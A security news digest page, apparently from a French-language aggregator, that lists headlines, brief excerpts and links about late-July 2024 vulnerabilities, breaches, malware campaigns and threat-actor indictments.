Critical Flaw in Telerik Report Server Poses Remote Code Execution Risk
Progress Software is urging users to update their Telerik Report Server instances following the discovery of a critical security flaw that could result in remote code execution.
The vulnerability, tracked as CVE-2024-6327 (CVSS score: 9.9), impacts Report Server version 2024 Q2 (10.1.24.514) and earlier.
"In Progress Telerik Report Server versions prior to 2024 Q2 (10.1.24.709), a remote code
https://thehackernews.com/2024/07/critical-flaw-in-telerik-report-server.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Changing the Passive to Active: Updating SaaS Cybersecurity Strategy with Threat Management
The massive Snowflake breach disclosed recently, involving hundreds of millions of stolen customer records, is a stark wake-up call for organizations to proactively manage their SaaS security. No doubt the...
The post Changing the Passive to Active: Updating SaaS Cybersecurity Strategy with Threat Management appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/changing-the-passive-to-active-updating-saas-cybersecurity-strategy-with-threat-management/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
North Korean Charged in Cyberattacks on US Hospitals, NASA & Military Bases
A North Korean military intelligence operative has been indicted for orchestrating a series of cyberattacks targeting U.S. hospitals, NASA, and military bases, federal prosecutors announced on Thursday. Rim Jong Hyok, a member of the Andariel Unit within North Korea’s Reconnaissance General Bureau, faces charges of conspiracy to commit computer hacking and money laundering. The indictment, […]
The post North Korean Charged in Cyberattacks on US Hospitals, NASA & Military Bases appeared first on Cyber Security News.
https://cybersecuritynews.com/north-korean-hacker-charged/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
LummaC2 Malware Abusing the Game Platform ‘Steam'
LummaC2 is an Infostealer that is being actively distributed, disguised as illegal programs (e.g. cracks, keygens, and game hacking programs) available from distribution websites, YouTube, and LinkedIn using the SEO poisoning technique. Recently, it has also been distributed via search engine ads, posing as web pages of Notion, Slack, Capcut, etc. The malware’s execution method has been constantly changing, with the current versions distributed either as a single EXE file or as a compressed file containing a malicious DLL and...
The post LummaC2 Malware Abusing the Game Platform ‘Steam’ appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/68309/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu de la veille (Presse)
State Treasurer's Office Raises Local Agency Cybersecurity Alarms - Industry Insider
A thwarted cyber attack against the Local Agency Investment Fund has the State Treasurer's Office warning local governments to review their ...
https://insider.govtech.com/california/news/state-treasurers-office-raises-local-agency-cybersecurity-alarms
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Georgia Today: Cyber attack suspect indicted; Athens to Savannah bike trail; Braves are Wild Card
News. Georgia Today: Cyber attack suspect indicted; Athens to Savannah bike trail; Braves are Wild Card. July 26, ...
https://www.gpb.org/news/2024/07/26/georgia-today-cyber-attack-suspect-indicted-athens-savannah-bike-trail-braves-are
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Watch Paris Trains Hit By 'Massive' Sabotage Ahead of Olympics - Bloomberg.com
On the eve of the Olympics, Trains across France have been disrupted. The country's Transport Minister Patrice Vergriete says "Coordinated ...
https://www.bloomberg.com/news/videos/2024-07-26/paris-trains-hit-by-massive-sabotage-ahead-of-olympics-video
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Dutchess County Earns Top-Ten Ranking for 22nd Consecutive Year
While the recent CrowdStrike shutdown was not a cyber-attack, malicious actors capitalized on the incident, attempting to obtain login credentials ...
https://www.dutchessny.gov/Departments/County-Executive/Dutchess-County-Earns-Top-Ten-Ranking-22nd-Consecutive-Year.htm
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CrowdStrike IT Outage: Wave of Business Interruption Claims Expected | HUB | K&L Gates
Most cyber-policies provide for written notice to be given as soon as practicable, or within a specified time period, of any cyber-attack or incident ...
https://www.klgates.com/CrowdStrike-IT-Outage-Wave-of-Business-Interruption-Claims-Expected-7-26-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scotiabank resolves technical issue impacting thousands of its customers - Reuters
... for improvement' for banks. 10 hours ago. Illustration shows words "Cyber Attack\ · LSEG Workspace · Business · Illustration of bitcoin and price ...
https://www.reuters.com/business/finance/thousands-scotiabank-customers-impacted-by-technical-issue-2024-07-26/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Jefferson County Clerk's Offices to reopen Saturday following cyber attack - MSN
LOUISVILLE, Ky. (WAVE) - Jefferson County Clerk's Office branches will be reopen Saturday after a cyber attack shut down operations for almost four ...
https://www.msn.com/en-us/news/other/jefferson-county-clerk-s-offices-remain-closed-after-cyber-attack/ar-BB1qDc88%3Focid%3DBingNewsVerp
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Orion raises R44m with SA investors taking lionshare - Miningmx
Previous articleCyber attack hit smelting at US mine, says Sibanye-Stillwater. Next articleCourt rules against farmers who fleece mining companies.
https://www.miningmx.com/top-story/57728-orion-raises-r44m-with-sa-investors-taking-the-lionshare/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu à J-2 (Presse spécialisée)
Top 4 Use Cases of Non-Human Identity Security: Live Event Recap
Originally published by Astrix on June 13, 2024.Last week we held an insightful live event featuring our solutions engineer, Michael Silva, and our CISO in Residence, Tim Youngblood. The event focused on the top four non-human identity (NHI) use cases that are crucial for security teams. Here's a recap of the key points discussed during the session, as well as the recording of the full event.Use case 1: Lifecycle managementThe first use case we discussed was Lifecycle Management. Tim and Mich...
https://cloudsecurityalliance.org/articles/top-4-use-cases-of-non-human-identity-security-live-event-recap
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Navigating Data Privacy in the Age of AI: How to Chart a Course for Your Organization
Originally published by BARR Advisory.Artificial intelligence (AI) raises significant data privacy concerns due to its ability to collect, analyze, and utilize vast amounts of personal information. So what role do companies that have implemented AI play in keeping user data secured? Let's dive in.One of the main concerns with AI is the potential for unauthorized access to and misuse of sensitive data. As AI algorithms rely heavily on data to function, there is a risk that personal information...
https://cloudsecurityalliance.org/articles/navigating-data-privacy-in-the-age-of-ai-how-to-chart-a-course-for-your-organization
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
PKfail Secure Boot bypass lets attackers install UEFI malware
Hundreds of UEFI products from 10 vendors are susceptible to compromise due to a critical firmware supply-chain issue known as PKfail, which allows attackers to bypass Secure Boot and install malware. [...]
https://www.bleepingcomputer.com/news/security/pkfail-secure-boot-bypass-lets-attackers-install-uefi-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mimecast Joins Human Risk Management Fray With Code42 Deal
Mimecast's acquisition of Code42 helps the company move into insider risk management, joining key rival Proofpoint and others in the space.
https://www.darkreading.com/insider-threats/mimecast-joins-human-risk-management-fray-with-code42-deal
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Critical ServiceNow RCE flaws actively exploited to steal credentials
Threat actors are chaining together ServiceNow flaws using publicly available exploits to breach government agencies and private firms in data theft attacks. [...]
https://www.bleepingcomputer.com/news/security/critical-servicenow-rce-flaws-actively-exploited-to-steal-credentials/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CrowdStrike 'Updates' Deliver Malware & More as Attacks Snowball
The fake updates are part of a phishing and fraud surge that is both more voluminous and more targeted that the usual activity around national news stories.
https://www.darkreading.com/threat-intelligence/crowdstrike-updates-malware-attacks-snowball
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Feds Warn of North Korean Cyberattacks on US Critical Infrastructure
The Andariel group is targeting critical defense, aerospace, nuclear, and engineering companies for data theft, the FBI, NSA, and others said.
https://www.darkreading.com/cyberattacks-data-breaches/feds-warn-of-north-korean-cyberattacks-on-us-critical-infrastructure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Progress Software fixed critical RCE CVE-2024-6327 in the Telerik Report Server
Progress Software addressed a critical remote code execution vulnerability, tracked as CVE-2024-6327, in the Telerik Report Server. Telerik Report Server is a web-based application designed for creating, managing, and delivering reports in various formats. It provides tools for report design, scheduling, and secure delivery, allowing organizations to centralize their reporting processes. Progress Software addressed a critical […]
https://securityaffairs.com/166168/security/telerik-report-server-cve-2024-6327.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From Top Dogs to Unified Pack
Each day often presents a new set of challenges and responsibilities, particularly as organizations accelerate digital transformation efforts. This means you and your cyber team may find yourselves navigating a complex landscape of multi-cloud environments and evolving compliance requirements.
https://blog.rapid7.com/2024/07/25/from-top-dogs-to-unified-pack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows 11 KB5040527 update fixes Windows Backup failures
Microsoft has released the optional KB5040527 preview cumulative update for Windows 11 23H2 and 22H2, which includes fixes for Windows Backup and upgrade failures. [...]
https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5040527-update-fixes-windows-backup-failures/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
US offers M for tips on DPRK hacker linked to Maui ransomware attacks
The U.S. State Department is offering a reward of up to million for information that could help capture a North Korean military hacker. [...]
https://www.bleepingcomputer.com/news/security/us-offers-10m-for-tips-on-dprk-hacker-linked-to-maui-ransomware-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Meta nukes massive Instagram sextortion network of 63,000 accounts
Meta has removed 63,000 Instagram accounts from Nigeria that were involved in sextortion scams, including a coordinated network of 2,500 accounts linked to 20 individuals targeting primarily adult men in the United States. [...]
https://www.bleepingcomputer.com/news/security/meta-nukes-massive-instagram-sextortion-network-of-63-000-accounts/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Researchers Claim Anyone Can Access Deleted, Private GitHub Repository Data
Cybersecurity researchers have revealed a GitHub design flaw that allows access to deleted and private repository data. Learn…
https://hackread.com/anyone-access-deleted-private-github-repository-data/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows update may present users with a BitLocker recovery screen
After the July Microsoft update some systems boot into a BitLocker Recovery screen. How can you find the key you need?
https://www.malwarebytes.com/blog/news/2024/07/windows-update-may-present-users-with-a-bitlocker-recovery-screen
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Onyx Sleet uses array of malware to gather intelligence for North Korea
On July 25, 2024, the United States Department of Justice (DOJ) indicted an individual linked to the North Korean threat actor that Microsoft tracks as Onyx Sleet. Microsoft Threat Intelligence collaborated with the Federal Bureau of Investigation (FBI) in tracking activity associated with Onyx Sleet. We will continue to closely monitor Onyx Sleet's activity to assess changes following the indictment.
The post Onyx Sleet uses array of malware to gather intelligence for North Korea appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/25/onyx-sleet-uses-array-of-malware-to-gather-intelligence-for-north-korea/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Progress warns of critical RCE bug in Telerik Report Server
Progress Software has warned customers to patch a critical remote code execution security flaw in the Telerik Report Server that can be used to compromise vulnerable devices. [...]
https://www.bleepingcomputer.com/news/security/progress-warns-of-critical-rce-bug-in-telerik-report-server/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Critical bug in Docker Engine allowed attackers to bypass authorization plugins
A critical flaw in some versions of Docker Engine can be exploited to bypass authorization plugins (AuthZ) under specific circumstances. A vulnerability, tracked as CVE-2024-41110 (CVSS score of 10.0), in certain versions of Docker Engine can allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. “An attacker could exploit a bypass using an API request with […]
https://securityaffairs.com/166160/hacking/docker-engine-critical-flaw.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chinese SMS Phishing Group Hits iPhone Users in India Post Scam
The notorious Chinese Smishing Triad gang, known for its SMS phishing attacks against Pakistan, the US, and European…
https://hackread.com/chinese-sms-phishing-group-iphone-users-india-post-scam/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
North Korean Hackers Shift from Cyber Espionage to Ransomware Attacks
A North Korea-linked threat actor known for its cyber espionage operations has gradually expanded into financially-motivated attacks that involve the deployment of ransomware, setting it apart from other nation-state hacking groups linked to the country.
Google-owned Mandiant is tracking the activity cluster under a new moniker APT45, which overlaps with names such as Andariel, Nickel Hyatt,
https://thehackernews.com/2024/07/north-korean-hackers-shift-from-cyber.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Nexo Cements User Data Security with SOC 3 Assessment and SOC 2 Audit Renewal
Nexo’s SOC 2 Type II reassessment and new SOC 3 report is the latest step in the organization's…
https://hackread.com/nexo-cements-user-data-security-soc-3-soc-2-audit-renewal/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
RA Ransomware Group Aggressively Attacking Manufacturing Sector
RA World, an emerging ransomware group, has been increasingly active since March 2024, using a multi-extortion tactic to steal data and threaten to leak it if the ransom is not paid. Their leak site shows a recent shift in targets from healthcare organizations to manufacturing, possibly due to seeking higher ransom payouts, but the reason […]
The post RA Ransomware Group Aggressively Attacking Manufacturing Sector appeared first on Cyber Security News.
https://cybersecuritynews.com/ra-ransomware-attacks-manufacturing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vigorish Viper, nn Advanced Suite for Cybercrime Supply Chain
Hackers make use of the cybercrime supply chain for a multitude of illicit purposes like acquiring and distributing malicious tools, services, and stolen data. This collaboration leads them to execute more sophisticated and widespread attacks by enabling them to specialize in specific aspects of cybercrime, enhance their capabilities, and scale their operations. Infoblox researchers recently […]
The post Vigorish Viper, nn Advanced Suite for Cybercrime Supply Chain appeared first on Cyber Security News.
https://cybersecuritynews.com/vigorish-viper-cybercrime-suite/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Buying Stuff For Free From Shopping Websites
Rapid7 is often tasked with evaluating the security of e-commerce sites. When dealing directly with customer financials, the security of these transactions is a top concern. Fortunately, there are ample pre-built e-commerce platforms one can simply purchase or install.
https://blog.rapid7.com/2024/07/25/buying-stuff-for-free-from-shopping-websites/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cyber insurance guidance
Cyber security considerations for organisations thinking about taking out cyber insurance.
https://www.ncsc.gov.uk/guidance/cyber-insurance-guidance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Unveiling the latest banking trojan threats in LATAM
This post was made possible through the research contributions of Amir Gendler. In our most recent research in the Latin American (LATAM) region, we at IBM Security Lab have observed a surge in campaigns linked with malicious Chrome extensions. These campaigns primarily target Latin America, with a particular emphasis on its financial institutions. In this […]
The post Unveiling the latest banking trojan threats in LATAM appeared first on Security Intelligence.
https://securityintelligence.com/posts/unveiling-latest-banking-trojan-threats-latam/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Infosec Analyst Jobs: Six-Figure Salaries
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in Fortune Sausalito, Calif. – Jul. 25, 2024 The bad news is that there is currently a major shortage of cybersecurity professionals; around 3.5 million cybersecurity professionals are needed globally to properly
The post Infosec Analyst Jobs: Six-Figure Salaries appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/infosec-analyst-jobs-six-figure-salaries/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deep Dive: Unveiling the Untold Challenges of Single Sign-On (SSO) Management
Single Sign-On (SSO) serves as the linchpin connecting corporate networks, facilitating seamless access to various web applications without the need for repeated login credentials. However, there are several untold challenges...
The post Deep Dive: Unveiling the Untold Challenges of Single Sign-On (SSO) Management appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/deep-dive-unveiling-the-untold-challenges-of-single-sign-on-sso-management/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Importance of Ethical Hacking in Cybersecurity
In an era where digital threats loom large over individuals and organizations alike, cybersecurity has…
The Importance of Ethical Hacking in Cybersecurity on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/25/the-importance-of-ethical-hacking-in-cybersecurity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Essential Guide to Total Protection in Microsoft 365
Businesses across the globe are increasingly adopting cloud-based services to optimize operations, boost productivity, and…
The Essential Guide to Total Protection in Microsoft 365 on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/25/the-essential-guide-to-total-protection-in-microsoft-365/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Artificial Intelligence: 'call for views' on the cyber security of AI closes soon
Businesses, academia and international partners invited to respond to the UK government's ‘call for views' on the security of AI.
https://www.ncsc.gov.uk/blog-post/ai-cyber-security-call-closes-soon
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
6 Types of Applications Security Testing You Must Know About
Application security testing is a critical component of modern software development, ensuring that applications are robust and resilient against malicious attacks. As cyber threats continue to evolve in complexity and frequency, the need to integrate comprehensive security measures throughout the SDLC has never been more essential. Traditional pentesting provides a crucial snapshot of an
https://thehackernews.com/2024/07/6-types-of-applications-security.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Huge Increase in Scanning for CVE-2017-9841 With Large Variability in Scanning Infrastructure
The rather old CVE-2017-9841, an RCE in PHPUnit, suddenly jumps to the top of our list, with an increase of nearly 400% since last month. We dig into the scanning infrastructure.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hackers exploit Microsoft Defender SmartScreen bug CVE-2024-21412 to deliver ACR, Lumma, and Meduza Stealers
The CVE-2024-21412 flaw in the Microsoft Defender SmartScreen has been exploited to deliver information stealers such as ACR Stealer, Lumma, and Meduza. Fortinet FortiGuard Labs researchers observed a malware campaign exploiting the vulnerability CVE-2024-21412 (CVSS score: 8.1) to spread information stealer, such as ACR Stealer, Lumma, and Meduza. The CVE-2024-21412 is an Internet Shortcut Files Security Feature Bypass Vulnerability. The flaw […]
https://securityaffairs.com/166152/security/cve-2024-21412-flaw-info-stealers.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Meta Removes 63,000 Instagram Accounts Linked to Nigerian Sextortion Scams
Meta Platforms on Wednesday said it took steps to remove around 63,000 Instagram accounts in Nigeria that were found to target people with financial sextortion scams.
"These included a smaller coordinated network of around 2,500 accounts that we were able to link to a group of around 20 individuals," the company said. "They targeted primarily adult men in the U.S. and used fake accounts to mask
https://thehackernews.com/2024/07/meta-removes-63000-instagram-accounts.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments
We explain how an automated BOLA detection tool harnessing GenAI discovered multiple BOLA vulnerabilities in open-source scheduling tool Easy!Appointments.
The post AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments appeared first on Unit 42.
https://unit42.paloaltonetworks.com/bola-vulnerabilities-easyappointments/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Webinar: Securing the Modern Workspace: What Enterprises MUST Know about Enterprise Browser Security
The browser is the nerve center of the modern workspace. Ironically, however, the browser is also one of the least protected threat surfaces of the modern enterprise. Traditional security tools provide little protection against browser-based threats, leaving organizations exposed. Modern cybersecurity requires a new approach based on the protection of the browser itself, which offers both
https://thehackernews.com/2024/07/webinar-securing-modern-workspace-what.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Condo.com - 1,481,555 breached accounts
In June 2019, now defunct website Condo.com suffered a data breach that was later redistributed as part of a larger corpus of data. The impacted data included 1.5M email addresses alongside names, phone numbers and for a small number of records, physical addresses.
https://haveibeenpwned.com/PwnedWebsites#CondoCom
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Threat Actors leveraging the recent CrowdStrike update outage
What is the Threat?FortiGuard Labs is aware of the campaigns used by threat actors to spread malware, using phishing and scams to take advantage of the recent widespread global IT outage affecting Microsoft Windows hosts. This outage is due to an issue with a recent CrowdStrike update that can cause a bug check or Blue Screen of Death (BSOD) on the affected Windows machines which may get stuck in a restarting state.Why is it significant?The outage has caused many businesses' operations to a halt worldwide across a variety of industries, including hospitals, banks, stock exchanges, and other institutions, as some Microsoft-based computers ceased to work. The threat actors have taken advantage of such events to spread malware, use phishing, and attempt other scams.What is the recommended mitigation?FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/5496
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Explore Talent - 5,371,574 breached accounts
In July 2024, a data breach attributed to Explore Talent was publicly posted to a popular hacking forum. Containing 5.7M rows with 5.4M unique email addresses, the incident has been described by various sources as occurring between early 2022 to 2023 and also contains names, phone numbers and physical addresses.
https://haveibeenpwned.com/PwnedWebsites#ExploreTalent
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybersecurity Firm KnowBe4 Tricked into Hiring North Korean Hacker as IT Pro
Cybersecurity firm KnowBe4 was tricked by a North Korean hacker posing as an IT worker whose next step…
https://hackread.com/cybersecurity-firm-knowbe4-hire-north-korean-hacker/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Python for Penetration Testing: Automating Cybersecurity with Python
Harnessing the Power of Python to Strengthen Cyber Defenses and Streamline Penetration Testing WorkflowsPhoto by Ferenc Almasi on UnsplashPython has become a staple language in the world of cybersecurity, particularly in the domain of penetration testing. Penetration testing, often referred to as ethical hacking, involves simulating cyber attacks to identify vulnerabilities in systems, networks, and applications before malicious actors can exploit them. Python's simplicity, versatility, and extensive libraries make it an ideal choice for developing custom penetration testing tools and automating various phases of the testing process.In this article, we'll explore how Python is used in penetration testing tools and frameworks like Metasploit, Nmap, and Scapy. We'll delve into scripting...
https://infosecwriteups.com/python-for-penetration-testing-automating-cybersecurity-with-python-f9ea2165852a?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Michigan Medicine data breach impacted 56953 patients
A cyber attack against Michigan Medicine resulted in the compromise of the personal and health information of approximately 57,000 patients. The academic medical center of the University of Michigan, Michigan Medicine, suffered a data breach that impacted 56953 patients. The security incident exposed the personal and health information of the patients. Michigan Medicine notified patients […]
https://securityaffairs.com/166138/cyber-crime/michigan-medicine-data-breach.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu des jours précédents
China-Backed Phishing Attack Targets India Postal System Users
A large text-message phishing attack campaign attributed to the China-based Smishing Triad employs malicious iMessages.
https://www.darkreading.com/endpoint-security/china-backed-smishing-campaign-targets-india-post-users
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
HIPAA and Pentesting: What You Need to Know
Learn how to maintain compliance with HIPAA security standards through pentesting.
https://www.hackerone.com/security-compliance/hipaa-pentesting
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
U.S. CISA adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of the flaws added to the KEV catalog: CVE-2012-4792 (CVSS score of […]
https://securityaffairs.com/166126/breaking-news/u-s-cisa-adds-microsoft-internet-explorer-and-twilio-authy-bugs-known-exploited-vulnerabilities-catalog.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6915-1: poppler vulnerability
It was discovered that poppler incorrectly handled certain malformed PDF.
An attacker could possibly use this issue to cause a denial of service.
https://ubuntu.com/security/notices/USN-6915-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6914-1: OCS Inventory vulnerability
Filip Hejsek discovered that the phpCAS library included in OCS Inventory
was using HTTP headers to determine the service URL used to validate
tickets. A remote attacker could possibly use this issue to gain access
to a victim's account.
https://ubuntu.com/security/notices/USN-6914-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6913-1: phpCAS vulnerability
Filip Hejsek discovered that phpCAS was using HTTP headers to determine
the service URL used to validate tickets. A remote attacker could
possibly use this issue to gain access to a victim's account on a
vulnerable CASified service.
This security update introduces an incompatible API change. After applying
this update, third party applications need to be modified to pass in an
additional service base URL argument when constructing the client class.
For more information please refer to the section
"Upgrading 1.5.0 -> 1.6.0" of the phpCAS upgrading document:
https://github.com/apereo/phpCAS/blob/master/docs/Upgrading
https://ubuntu.com/security/notices/USN-6913-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
TracFone will pay million to settle FCC data breach investigation
Prepay wireless provider TracFone has been slapped on the wrist to the tune of million for insufficient customer data protection
https://www.malwarebytes.com/blog/news/2024/07/tracfone-will-pay-16-million-to-settle-fcc-data-breach-investigation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hack My Career: Meet Naz Bozdemir
https://www.hackerone.com/culture-and-talent/hack-my-career-meet-naz-bozdemir
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Zero Trust in the Age of AI: Join our online event to learn how to strengthen your security posture
Register for the “Zero Trust in the Age of AI” webcast to learn more about how our new capabilities in identity and network access and security operations make it easier to implement Zero Trust across your entire environment.
The post Zero Trust in the Age of AI: Join our online event to learn how to strengthen your security posture appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/24/zero-trust-in-the-age-of-ai-join-our-online-event-to-learn-how-to-strengthen-your-security-posture/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Indian Firm Linked to Fake DMCA Notices Silencing Journalists
Is critical journalism under attack? A recent exposé reveals a disturbing trend: Companies, in this case, an Indian…
https://hackread.com/fake-dmca-requests-threaten-investigative-journalism/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybercrime Surges. Humans Are Still The Weakest Link.
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in The CEO Magazine Sausalito, Calif. – Jul. 24, 2024 Cybercrime expert Foo Siang-tse is under no illusions as to the size of the challenge ahead for global businesses as the
The post Cybercrime Surges. Humans Are Still The Weakest Link. appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybercrime-surges-humans-are-still-the-weakest-link/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Malware Campaign Lures Users With Fake W2 Form
Rapid7 has recently observed an ongoing campaign targeting users searching for W2 forms using the Microsoft search engine Bing.
https://blog.rapid7.com/2024/07/24/malware-campaign-lures-users-with-fake-w2-form/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Crisis communication: What NOT to do
Read the 1st blog in this series, Cybersecurity crisis communication: What to do When an organization experiences a cyberattack, tensions are high, customers are concerned and the business is typically not operating at full capacity. Every move you make at this point makes a difference to your company’s future, and even a seemingly small mistake can […]
The post Crisis communication: What NOT to do appeared first on Security Intelligence.
https://securityintelligence.com/articles/crisis-communication-what-not-to-do/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How the Newest Tech Changes Cybersecurity Needs in the Legal Industry
Responsibly Adopting Technology to Improve Law Firm Productivity Lawyers face incredible pressure in their jobs to perform accurately and quickly. Thankfully, technology has been introduced that now allows legal professionals...
The post How the Newest Tech Changes Cybersecurity Needs in the Legal Industry appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/how-the-newest-tech-changes-cybersecurity-needs-in-the-legal-industry/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New legislation will help counter the cyber threat to our essential services
The announcement of the Cyber Security and Resilience Bill is a landmark moment in tackling the growing threat to the UK's critical systems.
https://www.ncsc.gov.uk/blog-post/legislation-help-counter-cyber-threat-cni
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Exim 4.98 Addresses Critical Vulnerabilities, Bolsters Email Server Security
Exim is one of Unix-like systems' most widely used mail transfer agents. It's essential for email delivery and handling and is a significant part of the Internet email infrastructure.
https://linuxsecurity.com/news/security-vulnerabilities/exim-4-98-addresses-critical-security-bugs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows SmartScreen Flaw Enabling Data Theft in Major Stealer Attack
New Stealer Campaign Exploits Windows SmartScreen Vulnerability (CVE-2024-21412) – This large-scale attack targets Windows users, stealing passwords, browsing…
https://hackread.com/windows-smartscreen-flaw-data-theft-stealer-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
China-linked APT group uses new Macma macOS backdoor version
China-linked APT group Daggerfly (aka Evasive Panda, Bronze Highland) Evasive Panda has been spotted using an updated version of the macOS backdoor Macma. The China-linked APT group Daggerfly (aka Evasive Panda or Bronze Highland) has significantly updated its malware arsenal, adding a new malware family based on the MgBot framework and an updated Macma macOS backdoor. […]
https://securityaffairs.com/166102/apt/daggerfly-macma-macos-backdoor.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Accelerating Analysis When It Matters
Malware analysts demonstrate how to triage and analyze large amounts of samples with greater efficiency. Samples include Remcos RAT, Lumma Stealer and more.
The post Accelerating Analysis When It Matters appeared first on Unit 42.
https://unit42.paloaltonetworks.com/accelerating-malware-analysis/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6912-1: provd vulnerability
James Henstridge discovered that provd incorrectly handled environment
variables. A local attacker could possibly use this issue to run arbitrary
programs and escalate privileges.
https://ubuntu.com/security/notices/USN-6912-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6906-1: python-zipp vulnerability
It was discovered that python-zipp did not properly handle the zip files
with malformed names. An attacker could possibly use this issue to cause a
denial of service.
https://ubuntu.com/security/notices/USN-6906-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Navigating Australian ISM Guidelines for Software Development
In 2017, the Australian Cyber Security Centre (ACSC), a division of the Australian Signals Directorate (ASD), released the Information Security Manual (ISM). This comprehensive guide offers practical advice on safeguarding systems and data.
https://www.sonatype.com/blog/navigating-australian-ism-guidelines-for-software-development
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Adding a Twist to the Epic of Vulnerability Management
